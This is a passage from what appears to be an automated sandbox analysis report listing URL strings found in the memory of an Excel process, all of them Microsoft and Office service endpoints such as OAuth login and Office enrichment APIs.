Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile~9
Source: EXCEL.EXE, 00000000.00000003.413455560.000000000F457000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.607735341.000000000F457000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://dev.cortana.ai
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://dev.cortana.ai%
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://devnull.onenote.com
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://devnull.onenote.comed
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://devnull.onenote.comt
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://directory.services.
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://ecs.office.com/config/v2/Office?$
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://enrichment.osi.office.net/
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1J
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml91;
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://entitlement.diagnosticssdf.office.com.
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://entity.osi.office.net/t
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech5;
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechY;x9
Source: EXCEL.EXE, 00000000.00000002.608057018.0000000012BE0000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://graph.ppe.windows.net
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://graph.ppe.windows.netF
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://graph.windows.net
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://graph.windows.net/
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://graph.windows.netp
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://hubble.officeapps.live.com
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://hubble.officeapps.live.coml.
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?G
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
Source: EXCEL.EXE, 00000000.00000002.608057018.0000000012BE0000.00000004.00000001.sdmp String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=16
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=10
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: EXCEL.EXE, 00000000.00000002.608057018.0000000012BE0000.00000004.00000001.sdmp String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveApp/R
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingA9p;#
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: EXCEL.EXE, 00000000.00000003.413455560.000000000F457000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.607735341.000000000F457000.00000004.00000001.sdmp String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArts.dllF
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: EXCEL.EXE, 00000000.00000003.413455560.000000000F457000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.607735341.000000000F457000.00000004.00000001.sdmp String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebookdll
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickrz8_:.
Source: EXCEL.EXE, 00000000.00000003.413455560.000000000F457000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.607735341.000000000F457000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://lifecycle.office.com
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://lifecycle.office.comP
Source: EXCEL.EXE, 00000000.00000003.471459592.0000000012F1B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.513375649.0000000012F16000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472210677.0000000012F1B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.475142492.0000000012F1B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608801259.0000000012F1C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471289715.0000000012F16000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.413724346.0000000012F20000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.456916079.0000000012F1B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.513771352.0000000012F1B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.413524232.0000000012F20000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.512416539.0000000012F16000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://login.microsoftonline.com/
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.microsoftonline.com/4$
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorizeo
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://login.windows.local
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.localtes
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize#
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize)
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize-.
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize.
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize.-
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize/
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize4)
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize8
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize9
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize=/
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize?
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize?-
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeA)%
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeD..;.
